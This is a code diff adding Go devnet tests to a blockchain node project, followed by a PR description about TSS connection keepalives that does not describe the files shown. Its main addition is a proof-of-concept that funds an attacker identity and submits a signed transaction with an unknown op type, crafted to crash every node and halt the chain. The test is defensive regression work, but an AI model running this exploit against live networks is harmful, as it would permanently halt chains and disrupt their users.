+	}); err != nil {
+		t.Fatalf("[cv] node-%d did not log a consensus-version-lag reindex: %v", downNode, err)
+	}
+	t.Logf("[cv] node-%d triggered a version-lag full reindex", downNode)
+
+	// 9) After replaying from genesis under the correct rules it must re-adopt 0.3 and
+	// climb back past its pre-reindex head — consistent with the fleet.
+	if err := pollNode(downNode, 12*time.Minute, func() bool {
+		l, _, _, e := d.ConsensusInfo(ctx, downNode)
+		if e != nil || l != "0.3" {
+			return false
+		}
+		bh, be := d.getLastProcessedBlock(ctx, downNode)
+		return be == nil && bh >= preBlock
+	}); err != nil {
+		t.Fatalf("[cv] node-%d did not recover (re-adopt 0.3 and catch back up) after reindex: %v", downNode, err)
+	}
+	t.Logf("[cv] SUCCESS: node-%d survived restart, caught up late, reindexed on simulated lag, and recovered", downNode)
 }

--- a/tests/devnet/f4_nil_op_chain_halt_test.go
+++ b/tests/devnet/f4_nil_op_chain_halt_test.go
@@ -1,0 +1,404 @@
+package devnet
+
+// F4 devnet proof-of-concept — unprivileged nil-op permanent chain-halt
+//
+// The bug chain (all at commit bf473b1f):
+//   transactions.go:1261  OffchainTransaction.ToTransaction() switch has no
+//                          default → unknown op.Type leaves vtx as nil interface
+//   system_txs.go:1129-33 nil appended unfiltered to TxPacket.Ops
+//   state_engine.go:1931  ExecuteBatch loop calls vscTx.Type() on the nil BEFORE
+//                          any recover() → ProcessBlock panics on every ingesting node
+//
+// This test boots a 4-node devnet, funds an attacker Ethereum DID with enough
+// HBD for resource credits, crafts a validly-signed off-chain VSC transaction
+// with op.Type="consensus_stake" (an unknown off-chain type), submits it via the
+// submitTransactionV1 GQL mempool mutation, waits for the block producer to
+// include it in a VSC block, and asserts the halt.
+//
+// VERDICT signals:
+//   DEVNET-CONFIRMED  — heights freeze + nil-pointer panic in docker logs
+//   KILLED            — network keeps advancing (pool has op-type allowlist,
+//                       or nil-filter guards ExecuteBatch, or nil.Type() is recovered)
+//   BLOCKED-why       — devnet failed to start or fund path errored; see log
+//
+// Run:
+//   go test -v -run TestF4DevnetNilOpHalt -timeout 20m ./tests/devnet/
+
+import (
+	"context"
+	"encoding/base64"
+	"fmt"
+	"strings"
+	"testing"
+	"time"
+
+	"vsc-node/lib/dids"
+	"vsc-node/modules/common"
+	"vsc-node/modules/common/params"
+	systemconfig "vsc-node/modules/common/system-config"
+	transactionpool "vsc-node/modules/transaction-pool"
+
+	ethCrypto "github.com/ethereum/go-ethereum/crypto"
+)
+
+// TestF4DevnetNilOpHalt is the DEVNET-level proof-of-concept for finding F4.
+func TestF4DevnetNilOpHalt(t *testing.T) {
+	requireDocker(t)
+
+	// ── Phase 0: bring up a fast 4-node devnet ─────────────────────────────
+	cfg := DefaultConfig()
+	cfg.Nodes = 4       // minimum valid devnet
+	cfg.GenesisNode = 4 // mirror DefaultConfig invariant (genesis = last node); must be 1..Nodes
+	cfg.LogLevel = "info"
+	cfg.SysConfigOverrides = &systemconfig.SysConfigOverrides{
+		ConsensusParams: &params.ConsensusParams{
+			ElectionInterval: 20, // ~60s epochs; fast enough for block inclusion
+		},
+	}
+
+	// startDevnetNoKey handles New+Start+t.Cleanup for us.
+	d, ctx := startDevnetNoKey(t, cfg, 20*time.Minute)
+
+	t.Logf("F4: devnet running: GQL=%s Hive=%s", d.GQLEndpoint(1), d.HiveRPCEndpoint())
+
+	// ── Phase 1: confirm blocks are advancing ──────────────────────────────
+	t.Log("F4: waiting for all nodes to advance (baseline)...")
+	{
+		poll, cancel := context.WithTimeout(ctx, 4*time.Minute)
+		defer cancel()
+
+		// Poll until we see every node produce a new block three consecutive times.
+		var last [4]uint64
+		for attempt := 0; attempt < 3; attempt++ {
+			time.Sleep(15 * time.Second)
+			all := true
+			for n := 1; n <= cfg.Nodes; n++ {
+				h, _, err := d.LocalNodeInfo(poll, n)
+				if err != nil {
+					t.Logf("F4: magi-%d not yet responding (%v)", n, err)
+					all = false
+					break
+				}
+				if h == last[n-1] && attempt > 0 {
+					t.Logf("F4: magi-%d height stuck at %d", n, h)
+					all = false
+					break
+				}
+				last[n-1] = h
+			}
+			if all && attempt > 0 {
+				break
+			}
+		}
+		t.Logf("F4: baseline heights %v — blocks confirmed advancing", last)
+	}
+
+	// ── Phase 2: fund attacker ETH DID with HBD for resource credits ───────
+	//
+	// Off-chain txs need: valid DID signature + hive:account-or-DID that has
+	// enough HBD for rc_limit.  We generate a fresh Ethereum private key,
+	// deposit HBD to magi.test1's VSC account via the gateway, then transfer
+	// some HBD on to the attacker DID so the rc-system check passes.
+
+	privKey, err := ethCrypto.GenerateKey()
+	if err != nil {
+		t.Fatalf("F4 BLOCKED: generating ETH key: %v", err)
+	}
+	ethAddr := ethCrypto.PubkeyToAddress(privKey.PublicKey).Hex()
+	attackerDIDStr := dids.EthDIDPrefix + ethAddr // "did:pkh:eip155:1:0x..."
+	t.Logf("F4: attacker DID = %s", attackerDIDStr)
+
+	witnessAcct := "hive:" + d.witnessAccount(1)
+
+	// waitForHbd polls node-1's getAccountBalance until the account's VSC HBD
+	// reaches min base-units (3 decimals: 2.000 HBD == 2000), or timeout. Returns
+	// the last balance seen. Fixed sleeps are unreliable: this devnet's HAF
+	// testnet L1 can produce blocks far slower than 3s (genesis observed ~16s/
+	// block), so deposits and transfers take a variable, minutes-long time to be
+	// streamed and credited. The earlier 12s sleep raced the credit → the poison
+	// submit hit "not enough RCS" before the DID was funded (false KILL).
+	waitForHbd := func(account string, min int64, timeout time.Duration) int64 {
+		poll, cancel := context.WithTimeout(ctx, timeout)
+		defer cancel()
+		var last int64 = -1
+		for {
+			if bal, berr := d.GetAccountBalance(poll, 1, account); berr == nil && bal != nil {
+				last = bal.Hbd
+				if bal.Hbd >= min {
+					return bal.Hbd
+				}
+			}
+			select {
+			case <-poll.Done():
+				return last
+			case <-time.After(5 * time.Second):
+			}
+		}
+	}
+
+	// Deposit 5 HBD from magi.test1's Hive L1 balance into the VSC ledger.
+	// (witnesses were funded with 100 TBD by fundAccounts during devnet startup)
+	if _, err := d.Deposit(ctx, 1, "5.000", "hbd"); err != nil {
+		t.Fatalf("F4 BLOCKED: deposit HBD for witness-1: %v", err)
+	}
+	t.Log("F4: deposited 5.000 HBD into magi.test1 VSC ledger; waiting for credit...")
+	if got := waitForHbd(witnessAcct, 5000, 5*time.Minute); got < 5000 {
+		t.Fatalf("F4 BLOCKED: deposit never credited to %s (last hbd=%d) — devnet L1 too slow", witnessAcct, got)
+	}
+	t.Logf("F4: %s credited (hbd>=5000)", witnessAcct)
+
+	// Transfer 2 HBD from hive:magi.test1 → attacker ETH DID.
+	// TxVSCTransfer.ExecuteTx accepts any "did:*" or "hive:*" recipient and keys
+	// the balance verbatim (ledger_session.ExecuteTransfer), and the rc payer is
+	// RequiredAuths[0] (state_engine.go:1978) — the same DID string — so the
+	// attacker DID's RC budget is exactly its credited HBD.
+	transferPayload := map[string]interface{}{
+		"from":   witnessAcct,
+		"to":     attackerDIDStr,
+		"amount": "2.000",
+		"asset":  "hbd",
+		"net_id": d.netId(),
+	}
+	txId, err := d.BroadcastCustomJSON("vsc.transfer", []string{d.witnessAccount(1)}, transferPayload, d.cfg.InitminerWIF)
+	if err != nil {
+		t.Fatalf("F4 BLOCKED: transfer HBD to attacker DID: %v", err)
+	}
+	t.Logf("F4: transferred 2.000 HBD to attacker DID (L1 tx=%s); waiting for credit...", txId)
+	if got := waitForHbd(attackerDIDStr, 2000, 5*time.Minute); got < 2000 {
+		t.Fatalf("F4 BLOCKED: attacker DID never credited (last hbd=%d) — funding too slow or wrong ledger key", got)
+	}
+	t.Log("F4: attacker DID credited with >=2.000 HBD — RC budget ready")
+
+	// ── Phase 3: craft, sign, and submit the poison off-chain tx ───────────
+	//
+	// op.Type = "consensus_stake" is NOT in OffchainTransaction.ToTransaction()'s
+	// switch (only call/transfer/withdraw/stake_hbd/unstake_hbd are handled).
+	// No default case → vtx stays nil → appended to slice → ExecuteBatch panics.
+	//
+	// rc_limit: RcCostUnknown=50 covers the cost; 2 HBD (≥2000 base units) is
+	// more than enough for the rc-system check.
+
+	emptyPayload, err := common.EncodeDagCbor(map[string]interface{}{})
+	if err != nil {
+		t.Fatalf("F4 BLOCKED: encoding empty CBOR payload: %v", err)
+	}
+
+	poisonTx := &transactionpool.VSCTransaction{
+		Ops: []transactionpool.VSCTransactionOp{
+			{
+				Type:    "consensus_stake", // unknown off-chain op → nil VSCTransaction
+				Payload: emptyPayload,
+				RequiredAuths: struct {
+					Active  []string
+					Posting []string
+				}{
+					Active: []string{attackerDIDStr},
+				},
+			},
+		},
+		Nonce:   0,    // first tx from a fresh DID; nonce 0 is always valid
+		NetId:   d.netId(),
+		RcLimit: 50,   // RcCostUnknown = 50; within the attacker's 2 HBD budget
+	}
+
+	serialized, err := poisonTx.Serialize()
+	if err != nil {
+		t.Fatalf("F4 BLOCKED: serializing poison tx: %v", err)
+	}
+
+	signableBlk, err := poisonTx.ToSignableBlock()
+	if err != nil {
+		t.Fatalf("F4 BLOCKED: building signable block: %v", err)
+	}
+
+	ethProvider := dids.NewEthProvider(privKey)
+	sigStr, err := ethProvider.Sign(signableBlk)
+	if err != nil {
+		t.Fatalf("F4 BLOCKED: signing poison tx: %v", err)
+	}
+
+	sigPackage := transactionpool.SignaturePackage{
+		Type: "vsc-sig",
+		Sigs: []common.Sig{
+			{Algo: "eth", Kid: attackerDIDStr, Sig: sigStr},
+		},
+	}
+	sigBytes, err := common.EncodeDagCbor(sigPackage)
+	if err != nil {
+		t.Fatalf("F4 BLOCKED: encoding signature package: %v", err)
+	}
+
+	b64Tx := base64.StdEncoding.EncodeToString(serialized.Tx)
+	b64Sig := base64.StdEncoding.EncodeToString(sigBytes)
+
+	// submitTransactionV1 is declared in `type Query` in the schema, so we use "query" syntax.
+	const gqlSubmit = `query($tx:String!,$sig:String!){submitTransactionV1(tx:$tx,sig:$sig){id}}`
+	var submitOut struct {
+		SubmitTransactionV1 *struct {
+			Id *string `json:"id"`
+		} `json:"submitTransactionV1"`
+	}
+	err = d.gqlQuery(ctx, 1, gqlSubmit, map[string]any{"tx": b64Tx, "sig": b64Sig}, &submitOut)
+	if err != nil {
+		// classify the error
+		errMsg := err.Error()
+		switch {
+		case strings.Contains(errMsg, "rc_limit insufficient"):
+			t.Logf("F4: KILL-CONDITION — tx pool rejected: op-type allowlist or RC bounds block unknown ops")
+		case strings.Contains(errMsg, "not enough RCS"):
+			t.Logf("F4: KILL-CONDITION — attacker DID has insufficient RCs (transfer didn't land in time)")
+		case strings.Contains(errMsg, "missing required auth") || strings.Contains(errMsg, "failed to parse DID"):
+			t.Logf("F4: KILL-CONDITION — signature/DID validation blocked unknown op type")
+		case strings.Contains(errMsg, "nonce"):
+			t.Logf("F4: KILL-CONDITION — nonce check blocked submission: %v", err)
+		default:
+			t.Logf("F4: submit error (may be transient or kill condition): %v", errMsg)
+		}
+		t.Logf("F4: VERDICT=KILLED — pool rejected poison tx; chain halt not triggered via this path")
+		return
+	}
+
+	txCID := "<unknown>"
+	if submitOut.SubmitTransactionV1 != nil && submitOut.SubmitTransactionV1.Id != nil {
+		txCID = *submitOut.SubmitTransactionV1.Id
+	}
+	t.Logf("F4: poison tx ACCEPTED by node-1 mempool — CID=%s", txCID)
+	t.Logf("F4: now waiting for block producer to include tx and all nodes to panic...")
+
+	// ── Phase 4: poll head heights for up to 3 minutes ─────────────────────
+	//
+	// Normal block cadence: ~3s Hive blocks; a VSC block may span several Hive
+	// blocks.  After the poison tx is included and the VSC block lands, ALL nodes
+	// processing that Hive block will panic in ExecuteBatch.  They may:
+	//   (a) crash the node process entirely → container exits, GQL unreachable
+	//   (b) just freeze ProcessBlock loop
+	// Either way, head heights stop advancing.
+
+	var preHeights [4]uint64
+	for n := 1; n <= cfg.Nodes; n++ {
+		h, _, _ := d.LocalNodeInfo(ctx, n)
+		preHeights[n-1] = h
+	}
+	t.Logf("F4: heights at poison-tx submit time: %v", preHeights)
+
+	frozenSec := 0
+	const pollSec = 5
+	const haltThreshSec = 30 // 30s with zero progress → halt
+
+	deadline := time.Now().Add(3 * time.Minute)
+	halted := false
+	var haltHeights [4]uint64
+	copy(haltHeights[:], preHeights[:])
+
+	for time.Now().Before(deadline) {
+		time.Sleep(pollSec * time.Second)
+		var cur [4]uint64
+		anyAdvanced := false
+		for n := 1; n <= cfg.Nodes; n++ {
+			h, _, err := d.LocalNodeInfo(ctx, n)
+			if err != nil {
+				// node unreachable → either GQL is down (crash) or just slow;
+				// treat as no advancement for halt detection
+				cur[n-1] = haltHeights[n-1]
+				continue
+			}
+			cur[n-1] = h
+			if h > haltHeights[n-1] {
+				anyAdvanced = true
+				frozenSec = 0
+			}
+		}
+		haltHeights = cur
+		t.Logf("F4 heights: %v (frozenSec=%d)", haltHeights, frozenSec)
+
+		if !anyAdvanced {
+			frozenSec += pollSec
+		}
+		if frozenSec >= haltThreshSec {
+			halted = true
+			break
+		}
+	}
+
+	// ── Phase 5: capture docker logs for panic evidence ─────────────────────
+	nilPtrSeen := false
+	panicSeen := false
+	var panicNode int
+	var panicLines []string
+
+	for n := 1; n <= cfg.Nodes; n++ {
+		logs, err := d.Logs(ctx, fmt.Sprintf("magi-%d", n))
+		if err != nil {
+			t.Logf("F4: logs unavailable for magi-%d: %v", n, err)
+			continue
+		}
+		for _, line := range strings.Split(logs, "\n") {
+			if strings.Contains(line, "panic") {
+				panicSeen = true
+				if panicNode == 0 {
+					panicNode = n
+				}
+				panicLines = append(panicLines, fmt.Sprintf("magi-%d: %s", n, line))
+			}
+			if strings.Contains(line, "nil pointer dereference") ||
+				strings.Contains(line, "invalid memory address") {
+				nilPtrSeen = true
+				panicLines = append(panicLines, fmt.Sprintf("magi-%d: %s", n, line))
+			}
+			if strings.Contains(line, "ExecuteBatch") ||
+				strings.Contains(line, "ProcessBlock") ||
+				strings.Contains(line, "ToTransaction") {
+				panicLines = append(panicLines, fmt.Sprintf("magi-%d: %s", n, line))
+			}
+		}
+	}
+
+	for _, pl := range panicLines {
+		t.Logf("F4 PANIC LOG: %s", pl)
+	}
+
+	// Container liveness check
+	runningOut, _ := d.composeOutput(ctx, "ps", "--services", "--filter", "status=running")
+	t.Logf("F4: running services after poison: [%s]", strings.TrimSpace(runningOut))
+
+	deadNodes := 0
+	for n := 1; n <= cfg.Nodes; n++ {
+		svc := fmt.Sprintf("magi-%d", n)
+		if !strings.Contains(runningOut, svc) {
+			deadNodes++
+			t.Logf("F4: magi-%d NOT in running list (crashed / exited)", n)
+		}
+	}
+
+	// ── Phase 6: VERDICT ────────────────────────────────────────────────────
+	switch {
+	case halted && nilPtrSeen:
+		t.Logf("F4: VERDICT=DEVNET-CONFIRMED — chain halted (%ds frozen) + nil-pointer panic in node logs", frozenSec)
+		if deadNodes > 0 {
+			t.Logf("F4: producer-emits-vs-crashes: %d container(s) exited → ALL-NODES-HALT (block was emitted, every ingesting node panicked)", deadNodes)
+		}
+		// t.Errorf marks the test as failed so CI treats this as an open exploit.
+		t.Errorf("F4: CRITICAL — chain halt confirmed on devnet; fix required before mainnet")
+
+	case halted && panicSeen && !nilPtrSeen:
+		t.Logf("F4: VERDICT=DEVNET-CONFIRMED-HALT — halted (%ds) + panic in logs (nil pointer may be in stderr only)", frozenSec)
+		t.Errorf("F4: CRITICAL — chain halt confirmed on devnet")
+
+	case halted && !panicSeen:
+		t.Logf("F4: VERDICT=DEVNET-CONFIRMED-HALT-NO-PANIC — heights frozen but no panic logged (container may have exited silently)")
+		if deadNodes > 0 {
+			t.Errorf("F4: CRITICAL — %d container(s) died + heights frozen", deadNodes)
+		} else {
+			t.Errorf("F4: CRITICAL — heights frozen for %ds after poison tx; cause unclear from logs", frozenSec)
+		}
+
+	case !halted && !panicSeen:
+		// Network kept going → kill condition met
+		t.Logf("F4: VERDICT=KILLED — chain kept advancing after poison tx inclusion")
+		t.Logf("F4: Kill-condition evidence: heights at end %v (pre-submit: %v)", haltHeights, preHeights)
+		// Test PASSES — the bug was not exploitable via this path (fix in place or guard exists)
+
+	default:
+		t.Logf("F4: VERDICT=INCONCLUSIVE — halted=%v panic=%v nilPtr=%v deadNodes=%d", halted, panicSeen, nilPtrSeen, deadNodes)
+	}
+}

--- a/tests/devnet/gql.go
+++ b/tests/devnet/gql.go
@@ -177,6 +177,31 @@ func (d *Devnet) LocalNodeInfo(ctx context.Context, node int) (lastBlock, epoch 
 	return out.LocalNodeInfo.LastProcessedBlock, out.LocalNodeInfo.Epoch, nil
 }
 
+// ConsensusInfo returns a node's active consensus line, its own running version,
+// and the set of pending consensus-version candidate proposals (targets).
+func (d *Devnet) ConsensusInfo(ctx context.Context, node int) (activeLine, runningVersion string, proposalTargets []string, err error) {
+	const q = `query{localNodeInfo{active_consensus_line running_version consensus_version_proposals{target}}}`
+	var out struct {
+		LocalNodeInfo *struct {
+			ActiveConsensusLine       string `json:"active_consensus_line"`
+			RunningVersion            string `json:"running_version"`
+			ConsensusVersionProposals []struct {
+				Target string `json:"target"`
+			} `json:"consensus_version_proposals"`
+		} `json:"localNodeInfo"`
+	}
+	if err = d.gqlQuery(ctx, node, q, nil, &out); err != nil {
+		return "", "", nil, err
+	}
+	if out.LocalNodeInfo == nil {
+		return "", "", nil, fmt.Errorf("magi-%d returned nil localNodeInfo", node)
+	}
+	for _, p := range out.LocalNodeInfo.ConsensusVersionProposals {
+		proposalTargets = append(proposalTargets, p.Target)
+	}
+	return out.LocalNodeInfo.ActiveConsensusLine, out.LocalNodeInfo.RunningVersion, proposalTargets, nil
+}
+
 // TssRequestRecord is a TSS signing request as seen via GQL.
 type TssRequestRecord struct {
 	KeyId  string `json:"key_id"`

--- a/tests/devnet/mongo.go
+++ b/tests/devnet/mongo.go
@@ -150,6 +150,32 @@ func (d *Devnet) getLastProcessedBlock(ctx context.Context, node int) (uint64, e
 	return *result.LastProcessedBlock, nil
 }
 
+// seedProcessedUnderVersion overwrites the consensus version recorded against a
+// node's processed history in the hive_blocks metadata doc. It is a test affordance
+// for the reindex version-lag trigger: in a homogeneous-binary devnet every node
+// records its own running version, so to simulate a node that processed under an
+// OLDER version (a laggard that diverged) we write a lower processed_under_* directly.
+// On the node's next boot the reindex gate compares this against the chain-active
+// version at the head and, if lower, full-reindexes. The node must be stopped first.
+func (d *Devnet) seedProcessedUnderVersion(ctx context.Context, node int, major, consensus uint64) error {
+	client, err := d.mongoClient(ctx)
+	if err != nil {
+		return err
+	}
+	defer client.Disconnect(ctx)
+
+	coll := client.Database(d.nodeDbName(node)).Collection("hive_blocks")
+	_, err = coll.UpdateOne(ctx,
+		bson.M{"type": "metadata"},
+		bson.M{"$set": bson.M{
+			"processed_under_major":     major,
+			"processed_under_consensus": consensus,
+		}},
+		options.Update().SetUpsert(true),
+	)
+	return err
+}
+
 // CountRegisteredWitnesses returns the number of distinct accounts that have a
 // witness registration in the given node's DB. Every such record carries a
 // consensus key (SetWitnessUpdate rejects records without one), so this is the


### PR DESCRIPTION
TSS reshare delivers its round messages over on-demand unicast RPC streams to specific peers. Between reshares these direct connections sit idle and get torn down by NAT idle-eviction, connection-manager trimming, or transport keepalive timeouts — while libp2p still reports the peer as "connected" (half-open). Ordinary block production is unaffected because it rides the continuously active gossip mesh, but the next reshare then fails to deliver its round messages over a dead-but-"Connected" stream, stalling the reshare until the connection happens to be alive again (observed as ~30h mainnet stalls with the key frozen at an epoch; failing messages were only ~200 bytes, with errors like "no recent network activity" / "keepalive timeout").

The TSS test harness masks this in CI by keeping the mesh warm (startPeerKeepalive + ConnManager().Protect + reconnectNode); production had no equivalent.

Two transport-only changes (no impact on party-list construction, the serialized commitment, or the resulting CID):

1. runConnectionKeepalive (p2p.go, launched from TssManager.Start()): every 15s, for each enabled witness (deduped to its latest announcement) — Protect against connmgr trimming, reconnect if libp2p reports it disconnected, and send a cheap "ready" ping to generate traffic that resets NAT/transport idle timers so the connection never goes idle in the first place. Per-peer work runs concurrently; a failed ping is deliberately NOT treated as death (a live-but-busy peer must not be evicted). This traffic-generating warm-up is the load-bearing part.

2. SendMsg: reconnect from announced addresses if the peer is reported disconnected before giving up; and on an UNAMBIGUOUS idle-death send error ("no recent network activity" / "keepalive timeout" only) evict the half-open connection so it is re-dialed for subsequent sends. The eviction is intentionally narrow: ClosePeer is connection-wide and the reshare send path does not retry individual messages, so evicting on an ambiguous error (as a live-but-busy peer can emit under load) could drop a concurrent in-flight round message and stall that peer.

Adds unit coverage for the two new pure helpers (isTransportErr token classification, incl. regression guards that ambiguous errors do not evict; parseWitnessAddrs). go build ./modules/tss/..., go vet, and go test ./modules/tss/ (unit) all pass. The 6-node integration suite and the full devnet regression are CPU/RAM-bound and must be validated in CI / on a testnet canary.